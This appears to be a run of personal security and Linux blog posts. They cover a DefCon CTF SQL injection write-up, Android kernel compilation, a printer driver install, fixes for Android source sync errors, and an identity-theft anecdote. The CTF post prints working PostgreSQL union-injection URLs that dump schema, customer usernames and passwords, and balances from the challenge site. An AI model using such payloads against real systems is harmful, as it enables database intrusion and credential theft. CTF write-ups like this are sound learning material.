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DefCon CTF Quals GrabBag400 Writeup

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This was an interesting PostgreSQL injection challenge.
What is Jeff Moss’ checking account balance?
Bank Site – http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep

The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you

SQL injection in zip parameter. http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0

List of databases can be found by: http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0

Names of databases
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template1
template0
postgres
boa_bank

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20relname,A.attname,relname,A.attname,1,relname%20FROM%20pg_class%20C,pg_namespace%20N,pg_attribute%20A,pg_type%20T%20WHERE%20(C.relkind=’r’)%20AND%20(N.oid=C.relnamespace)%20AND%20(A.attrelid=C.oid)%20AND%20(A.atttypid=T.oid)%20AND%20(A.attnum%3E0)%20AND%20(NOT%20A.attisdropped)%20AND%20(N.nspname%20ILIKE%20’public’)&Submit.x=0&Submit.y=0

With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”.

Table,column_name
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transaction,amount
transaction,account
transaction,id
transaction,date
branch,id
branch,zip
branch,city
branch,name
branch,street
branch,phone
branch,state
customer,id
customer,firstname
customer,password
customer,lastname
customer,username
customer,email
account,id -> int
account,owner -> int
account,account -> string
account,balance
account,type -> checking/savings
sqlmapfile,data
test2234,t
hkk,t
mydata,t
mytable,mycol
hk,hk
sonic,sonic

Getting all customers (Jeff Moss can’t be found in the list though)
http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
Lots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!!

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20A.account,A.type,A.type,cast(A.balance%20as%20text),A.owner,A.account%20FROM%20account%20A%20where%20A.type%20ILIKE%20’checking’&Submit.x=0&Submit.y=0

Fun times!

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Custom Android Kernel Compilation HOWTO

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I have been trying for the last few weeks to get the Android Kernel source and then build a kernel of my own and then load it into the emulator to try to test out the modules. I spent numerous hours in trying to understand about how to go about it. So here’s a post so I can log all that I did in an effort from going from nothing to having my kernel loaded in the Android Emulator.

There are posts such as the one on eeknay32’s blog and the Stackoverflow post that really helped me in getting started. Also there is a HOWTO in the qemu documentation located at external/qemu/docs/KERNEL.TXT

I first started to follow the directions from here but this is only to get the source code of the Android SDK and other tools and to compile those. That was not initially my goal because getting the source of the tools and SDK was not my goal. Don’t bother downloading this (you could get the tools pre-compiled) unless you really want to compile the tools on your own.

The following steps will help you compile the code for the Android emulator and other tools:
sudo apt-get install git-core gnupg flex bison gperf build-essential \
zip curl zlib1g-dev libc6-dev lib32ncurses5-dev ia32-libs \
x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev \
libgl1-mesa-dev g++-multilib mingw32 tofrodos python-markdown \
libxml2-utils xsltproc
mkdir ~/bin
export PATH=~/bin:$PATH
curl https://dl-ssl.google.com/dl/googlesource/git-repo/repo > ~/bin/repo
chmod a+x ~/bin/repo
cd src
repo init -u https://android.googlesource.com/platform/manifest -b android-2.3_r1
repo sync
. build/envsetup.sh
lunch full-eng

Now going to our main goal.

Get the Android source
git clone https://android.googlesource.com/kernel/goldfish.git goldfish
cd goldfish

Put the cross compilation toolchain into your path and also put the tools (emulator, android tools etc) in your path:
export PATH=$PATH:~/bin:~/bin/src/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin:/root/bin/src/out/host/linux-x86/bin
make ARCH=arm goldfish_defconfig
make ARCH=arm SUBARCH=arm CROSS_COMPILE=arm-eabi- -j4

This is a good resource on different errors you could encounter. If you get a message “zImage is ready” you are good to load this image into the emulator to have a running emulator.
Before you run the android tool you need to first set an environment variable otherwise the tool will complain that ANDROID_SWT is not set.
export ANDROID_SWT=/root/bin/src/prebuilt/linux-x86_64/swt

Now you have to download some of the SDK Framework from the Google website so that you can create your own Android Virtual Device (AVD). Without downloading the SDK platform you will get no output when you issue the following command:
android list targets
After you get the right ANDROID platform you can issue the following commands:
android create avd -n my_android1.5 -t 1
emulator -kernel ~/bin/kern/kernel-common/goldfish/arch/arm/boot/zImage -show-kernel -verbose @my_android1.5

Now you should have a running emulator with your shiny new kernel.
Now if you want to compile your own kernel module and load it into the emulator at runtime then you need to use Android Debug Bridge (ADB) tool. See this post, where the author creates a kernel module. For me I had to modify the Makefile a little as shown below:
VERSION = 2
PATCHLEVEL = 6
SUBLEVEL = 29
EXTRAVERSION = -00054-g5f01537
obj-m += hello.o
KDIR=/root/bin/kern/kernel-common/goldfish
PWD := $(shell pwd)
all:
make -C $(KDIR) ARCH=arm CROSS_COMPILE=/root/bin/src1/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi- SUBDIRS=$(PWD) modules

clean:
make -C $(KDIR) ARCH=arm CROSS_COMPILE=/root/bin/src1/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi- SUBDIRS=$(PWD) clean

Issue the make command from the directory where you have your makefile and the sources to get hello.ko.
See the partition not mounted as read only by searching for “rw” mount mode by issuing the following command:
/root/bin/src/out/host/linux-x86/bin/adb shell mount
/root/bin/src/out/host/linux-x86/bin/adb push hello.ko /data
/root/bin/src/out/host/linux-x86/bin/adb insmod /data/hello.ko

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Brother HL-2040 Linux install on Backtrack 4

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I was getting CUPSD errors when trying to use my Laser Brother HL 2040 printer. But, you can install Brother HL-2040 by going to the brother website and downloading the linux drivers located here:
http://welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html#HL-2040
I just installed the lpd driver using the command as follows:
$ sudo dpkg -i brhl2070nlpr-2.0.1-1.i386.deb
When printing now, just select local lpd and then select brother-HL2070 printer from the list (the drivers for both versions are same).

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Android Source Downloading Errors

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Over this weekend I decided to download the Android source tree on my computer (Backtrack 4 R2). The BT4R2 is no longer supported by the Offsec/Backtrack guys (mutt, purehate, etc.).
To start off with I tried to follow the instructions listed here.
The first error I got was with Git, I was using a version earlier than 1.5.4. So I downloaded git version 1.7.4, compiled it and installed it. Then I got the error:
fatal: unable to find remote handler for 'https'
Too bad, I tried recompiling and what not, and I did have openssl…so what was the problem?
The problem was not having libcurl-devel library. So I downloaded the library and launched configure, make clean, make and make install to reinstall git. Now the error was gone.

On the step where I am supposed to execute the following:
$ repo init -u https://android.googlesource.com/platform/manifest
I got the following error:

Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/threading.py", line 446, in run
self.__target(*self.__args, **self.__kwargs)
File "/home/user/bin/.repo/repo/subcmds/sync.py", line 182, in _FetchHelper
success = project.Sync_NetworkHalf(quiet=opt.quiet)
File "/home/user/bin/.repo/repo/project.py", line 926, in Sync_NetworkHalf
if alt_dir is None and self._ApplyCloneBundle(initial=is_new, quiet=quiet):
File "/home/user/bin/.repo/repo/project.py", line 1444, in _ApplyCloneBundle
exist_dst = self._FetchBundle(bundle_url, bundle_tmp, bundle_dst, quiet)
File "/home/user/bin/.repo/repo/project.py", line 1514, in _FetchBundle
size = r.headers['content-length']
File "/usr/lib/python2.5/rfc822.py", line 384, in __getitem__
return self.dict[name.lower()]
KeyError: 'content-length'
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/threading.py", line 446, in run
self.__target(*self.__args, **self.__kwargs)
File "/home/user/bin/.repo/repo/subcmds/sync.py", line 182, in _FetchHelper
success = project.Sync_NetworkHalf(quiet=opt.quiet)
File "/home/user/bin/.repo/repo/project.py", line 926, in Sync_NetworkHalf
if alt_dir is None and self._ApplyCloneBundle(initial=is_new, quiet=quiet):
File "/home/user/bin/.repo/repo/project.py", line 1444, in _ApplyCloneBundle
exist_dst = self._FetchBundle(bundle_url, bundle_tmp, bundle_dst, quiet)
File "/home/user/bin/.repo/repo/project.py", line 1514, in _FetchBundle
size = r.headers['content-length']
File "/usr/lib/python2.5/rfc822.py", line 384, in __getitem__
return self.dict[name.lower()]
KeyError: 'content-length'
Exception in thread Thread-4:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/threading.py", line 446, in run
self.__target(*self.__args, **self.__kwargs)
File "/home/user/bin/.repo/repo/subcmds/sync.py", line 182, in _FetchHelper
success = project.Sync_NetworkHalf(quiet=opt.quiet)
File "/home/user/bin/.repo/repo/project.py", line 926, in Sync_NetworkHalf
if alt_dir is None and self._ApplyCloneBundle(initial=is_new, quiet=quiet):
File "/home/user/bin/.repo/repo/project.py", line 1444, in _ApplyCloneBundle
exist_dst = self._FetchBundle(bundle_url, bundle_tmp, bundle_dst, quiet)
File "/home/user/bin/.repo/repo/project.py", line 1514, in _FetchBundle
size = r.headers['content-length']
File "/usr/lib/python2.5/rfc822.py", line 384, in __getitem__
return self.dict[name.lower()]
KeyError: 'content-length'
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/threading.py", line 446, in run
self.__target(*self.__args, **self.__kwargs)
File "/home/user/bin/.repo/repo/subcmds/sync.py", line 182, in _FetchHelper
success = project.Sync_NetworkHalf(quiet=opt.quiet)
File "/home/user/bin/.repo/repo/project.py", line 926, in Sync_NetworkHalf
if alt_dir is None and self._ApplyCloneBundle(initial=is_new, quiet=quiet):
File "/home/user/bin/.repo/repo/project.py", line 1444, in _ApplyCloneBundle
exist_dst = self._FetchBundle(bundle_url, bundle_tmp, bundle_dst, quiet)
File "/home/user/bin/.repo/repo/project.py", line 1514, in _FetchBundle
size = r.headers['content-length']
File "/usr/lib/python2.5/rfc822.py", line 384, in __getitem__
return self.dict[name.lower()]
KeyError: 'content-length'
Exception in thread Thread-5:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/threading.py", line 446, in run
self.__target(*self.__args, **self.__kwargs)
File "/home/user/bin/.repo/repo/subcmds/sync.py", line 182, in _FetchHelper
success = project.Sync_NetworkHalf(quiet=opt.quiet)
File "/home/user/bin/.repo/repo/project.py", line 926, in Sync_NetworkHalf
if alt_dir is None and self._ApplyCloneBundle(initial=is_new, quiet=quiet):
File "/home/user/bin/.repo/repo/project.py", line 1444, in _ApplyCloneBundle
exist_dst = self._FetchBundle(bundle_url, bundle_tmp, bundle_dst, quiet)
File "/home/user/bin/.repo/repo/project.py", line 1514, in _FetchBundle
size = r.headers['content-length']
File "/usr/lib/python2.5/rfc822.py", line 384, in __getitem__
return self.dict[name.lower()]
KeyError: 'content-length'
error: Exited sync due to fetch errors

Seems like this error is caused because the content-length http header is not sent by the repository. If you upgrade to Python 2.7.x you can resolve this error.
Now if you are compiling Python from source, it doesn’t come by default with SSL support. So to add SSL support you should edit the Python-2.7/Modules/Setup file and uncomment four lines:
_socket socketmodule.c
# Socket module helper for SSL support; you must comment out the other
# socket line above, and possibly edit the SSL variable:
SSL=/usr
_ssl _ssl.c \
-DUSE_SSL -I$(SSL)/include -I$(SSL)/include/openssl \
-L$(SSL)/lib -lssl -lcrypto

Of course, then you can do the standard steps to compile and install python:
$ ./configure
$ make
$ sudo make install

repo sync would work very well thereafter.

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The case of an ID theft scam

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An interesting incident happened this past week to a friend – he had his identity stolen. More specifically, someone got a hold of his social security number (SSN), his date of birth (apparently) and his address. What the scammers or their “mules” (a term used to describe criminals who act on behalf of the actual criminal at their behest) did was that they went to the bank and requested to wire a huge sum of money to an account. The neat trick they played was before actually going to the bank they called the Verizon helpdesk and suspended my friend’s phone service. When they reached the bank and showed the bank agent the ID (some sort of a non-standard / fake ID) and gave the SSN to the bank agent, he/she grew suspicious and tried to contact my friend. However, due to Verizon suspending his phone service, the bank agent couldn’t get a hold of my friend. Luckily, the bank agent also sent my friend an email to which he responded promptly. The culprits were arrested and the investigation is still on.
What was quite interesting was, the modus operandi where the criminals know that banks rely on calling the customers if they suspect fraud and they had this covered. Quite intelligent.
So, you know what you need to do if your phone suddenly stops working – check if ID thieves have had a run on you, change all your passwords including email, change your credit card accounts and bank accounts and PINs and place a hold on your credit history with the credit reporting agencies such as Experian, Equifax and TransUnion.